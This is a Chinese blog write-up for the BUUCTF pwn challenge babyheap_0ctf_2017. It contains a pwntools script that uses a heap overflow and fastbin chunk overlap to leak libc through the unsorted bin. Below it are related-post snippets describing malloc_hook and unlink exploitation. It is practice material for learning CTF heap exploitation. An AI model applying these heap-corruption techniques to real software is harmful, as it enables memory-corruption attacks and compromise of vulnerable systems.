BUUCTF Pwn babyheap_0ctf_2017 Unsorted bin attack部分

于 2025-03-18 22:03:50 发布
阅读量196 收藏
点赞数 3
分类专栏: BUUCTF Pwn 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_33348179/article/details/146344004
版权

checksec exeinfo

开启了全保护 64位

查看函数:

堆题 增删查改齐了

可以在编辑堆的时候重新设置大小 存在堆溢出

delete函数的指针清零了 无UAF

想法是通过unsorted bin泄露libc基址:

from pwn import *

p = process('./babyheap')
#p = remote("node5.buuoj.cn", 25783)
context.log_level = 'debug'

def add(size):
    p.sendlineafter("Command: ", str(1))
    p.sendlineafter("Size: ", str(size))

def edit(index, size, content):
    p.sendlineafter("Command: ", str(2))
    p.sendlineafter("Index: ", str(index))
    p.sendlineafter("Size: ", str(size))

    p.sendlineafter("Content: ", content)
def delete(index):
    p.sendlineafter("Command: ", str(3))
    p.sendlineafter("Index: ", str(index))

def show(index):
    p.sendlineafter("Command: ", str(4))
    p.sendlineafter("Index: ", str(index))

add(0x10) #chunk0 方便修改接下来的chunk 
add(0x10) #chunk1 让chunk2变为fastbin的fd指针先指向它
add(0x10) #chunk2 修改fd 使其指向chunk4
add(0x10) #chunk3 方便让chunk4绕过fastbin检查并复原
add(0x80) #chunk4 最终unsortedbin指针的存放处
delete(1) 
delete(2) 

gdb.attach(p)
pause()

payload = p64(0) * 3 + p64(0x21) + p64(0) * 3 + p64(0x21) + p8(0x80)
edit(0, len(payload), payload)
#将chunk2的末8位改为0x80(指向chunk4)

payload = p64(0) * 3 + p64(0x21)
edit(3, len(payload), payload)
#暂时修改chunk4的大小使其能够被加入fastbin链表

add(0x10)
add(0x10)
#两次malloc0x10让第二次的malloc为chunk4

payload = p64(0) * 3 + p64(0x91)
edit(3, len(payload), payload)
#大小改回来

add(0x80)
delete(4)
pause()
#此时chunk4进入了unsorted bin链表 此时chunk2指向chunk4
show(2)
p.recvline()
libc_base = u64(p.recvuntil('\x7f')[-6:].ljust(8,b'\0')) - 0x3c4b78
print(hex(libc_base))
pause()

偏移使用gdb查看:

图示:

BUUCTF-babyheap_0ctf_2017
Rt1Text的博客
11-27 827
标准堆菜单。
CTF pwn题堆入门 -- Unsorted bin
lifanxin的博客
04-08 3487
Unsorted bin概述攻击方式泄露libc地址总结 概述   Unsorted bin也是堆题中常见的,当一个堆块被释放时,且该堆块大小不属于fast bin(libc-2.26之后要填满tcache),那么在进入small bin和large bin之前,都是先加入到unsorted bin的。之后当我们再次分配内存到unsorted bin上寻找时,如果申请的内存堆块小于寻找的unsorted bin,那么会将该内存块切割后返回给用户,剩下的仍然保存在unsorted bin上;如果申请的内存堆块
0ctf_2017_babyheap详解
像初雪一样自由洒落
04-19 4365
本文主要列出0ctf_2017_babyheap的详细过程 主要参考:https://bbs.pediy.com/thread-223461.htm 程序流程 allocate:申请size大小的块 fill:对idx的块,设置size,并填入content free:释放idx的块 dump:打印idx的块内容 漏洞分析 fill中的size可以重新设置,故可以造成堆溢出。 方法:fastbin attack double free泄露libc 【small/large chunk释放,fd和.
0ctf Babyheap 2017
Bill
03-11 6603
0ctf 2017 BabyHeap 1. 题目分析 Arch: amd64-64-little RELRO: Full RELRO Stack: Canary found NX: NX enabled PIE: PIE enabled 如果RELRO: Partial RELRO, 有可能是格式化字符串。 结论...
babyheap_0ctf_2017
m0sway的博客
11-25 707
babyheap_0ctf_2017 使用checksec查看: 保护全开,看到PIE的时候就想到需要泄露libc_base_addr了 拉进IDA中看吧: 一个死循环,主要功能Allocate、Fill、Free、Dump,这边我已经修改函数名了,接下来一个一个看 首先是创建堆: 最多创建15个chunk、每个chunk的最大size是4096 *(0x18LL * i + a1) = 1;创建chunk时给了标志1 接着是编辑堆内容: 判断了标志存不存在,若chunk存在,让用户输入size存放
babyheap_0ctf_2017 详细解析【BUUCTF
qq_41696518的博客
09-06 3689
好家伙,保护全开,根据文件名,可以判断这是一道堆题目,刷了这么久,终于遇到堆题目了,解析就写的详细点。先看main函数,很简单就是各类个目录函数,一步一步来看把。
0CTF-babyheap2017祥讲
Jc
07-26 574
解题思路 1. 查看文件信息,安全机制 2. IDA审计 3. 分析漏洞点 4. 编写EXP 1.基本信息 安全机制 安全机制全部开启了,其实不用慌,对我们做题影响不是很大 运行 ## IDA ...
从零开始学howtoheap:理解fastbins的​unsorted bin攻击
weixin_44626085的博客
02-13 1116
how2heap是由shellphish团队制作的堆利用教程,介绍了多种堆利用技术,后续系列实验我们就通过这个教程来学习。
攻防世界 pwn babyheap writeup
liucc09的博客
01-19 661
分析 这题题目中显示是Wellcome To the 2.27 Heap World,而且只能申请7个chunk,理论上应该是一道libc2.27 tcache的题,但因为在交互过程中触发了fastbin的double free错误,所以攻防世界上应该是把这题部署在了libc2.23的环境中,但无所谓,下面libc2.27和libc2.23的解法都会给出。 libc2.27解法 首先我们要泄漏libc的地址,tcache肯定是无法泄漏libc的,因此我们考虑使用unsorted bin来泄漏,这题有off
BUUCT-PWN 0ctf_2018_heapstorm2(house of storm)
weixin_44145820的博客
04-25 1773
目录题目分析漏洞利用Exp 题目分析 这题估计是house of storm利用的起源? 因为用这种办法直接就可以做通,后面还有rctf_2019_babyheap也需要用到house of storm,但是那题限制条件多多了 init()里先把fastbin禁用了 申请了0x13370000这块内存,并且做了初始化 初始化首先读入长度为0x18的随机数,就记为3个long long随机数吧...
buuctf (0ctf_2017_babyheap) (hitcon2014_stkof)
cainiao78777的博客
05-25 230
伪造fake_chunk然后向前和并,出发unlink,修改第一个堆块指针,为free的got表,第二块的指针改为puts的got表,然后再把free的got表改为puts的plt表,然后free堆块2,泄露出libc_base,然后计算出system函数的地址,再把free的got表改为system函数,然后释放字符串为/bin/sh的堆块,getshell。输入一个申请的大小。正常申请堆块,输入大小,然后按大小申请一个,返回堆块的序号。这个输出并不会打印堆块的内容,是个假的输出。查看程序逻辑以及保护。
[BUUCTF]PWN——babyheap_0ctf_2017
has_zaoganmaqule的博客
07-17 651
这题目我是在ctfshow里面看到的,因为ctfshow给的wp真的太抽象了。所以我就搜了搜,找到了原题,但我看别人写的都不是很好。所以后面自己尝试pwn成功了。首先查看保护全开是吧!!!放神的武器ida里面看看main函数一眼,菜单题cadd函数就很正常,调用calloc函数来申请堆块。(calloc函数和malloc函数的区别就是是否进行初始化,虽然calloc初始化看着更安全点,但是性能特别慢,而且在实际环境中好多变量都不需要进行初始化)
2017 0ctf babyheap
Grxer的博客
03-21 223
刚开始的init_my会利用/dev/urandom随机函数用mmap随机映射一块内存给我们存放指针,没有了确定地址,我们就不好去构成unlink攻击allocate()根据我们输入的size构成如下一个结构体,把指针放在mmap的堆上fill()也会根据我们的size进行读写,任意堆溢出,这就好办了freechunk()挺好的,该置零的都置零。
0ctf_2017_babyheap
u014377094的博客
03-10 544
本人double free+fastbin攻击第一道题,看了两天,好在理解下来不难。 参考传送门[分享]0ctf2017 - babyheap-Pwn-看雪论坛-安全社区|安全招聘|bbs.pediy.com 惯例checksec一下 打开ida 1创建chunk,按1,2依次创建,2往里写,3free掉指定数字chunk,4print出指定chunk内容 不建议跟ida里一些函数死磕,硬读会恶心到,理解就ok。 这里先放exp,读一遍exp咱们再来解释 from pwn import
BUUCTF:0ctf_2017_babyheap
weixin_51055545的博客
01-07 1673
一天一道buu 今天做了这道堆题没有想象的难,毕竟是道1分的题 例行检查 64位程序,保护机制全开的,放到IDA 漏洞分析 漏洞在edit()函数中,我们add()之后,在edit()时,能再次控制size的大小,存在堆溢出。 分析好漏洞后,就开始利用 利用思路和分析 1.我们先利用堆溢出泄露出libc地址 2.劫持fd指针到malloc_hook,覆盖malloc_hook为one_gadget,当再次申请堆块时调用one_gadget,从而get shell 分析 首先堆布局,申请0x100的堆,释放
buuctf pwn others_shellcode
最新发布
02-25
### BUUCTF Pwn Others_shellcode 解题思路 #### 题目概述 此题目属于PWN类别中的shellcode编写挑战。目标是在给定环境中执行任意代码,通常通过构造特定的机器码来实现这一目的[^1]。 #### 环境准备 为了成功完成...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值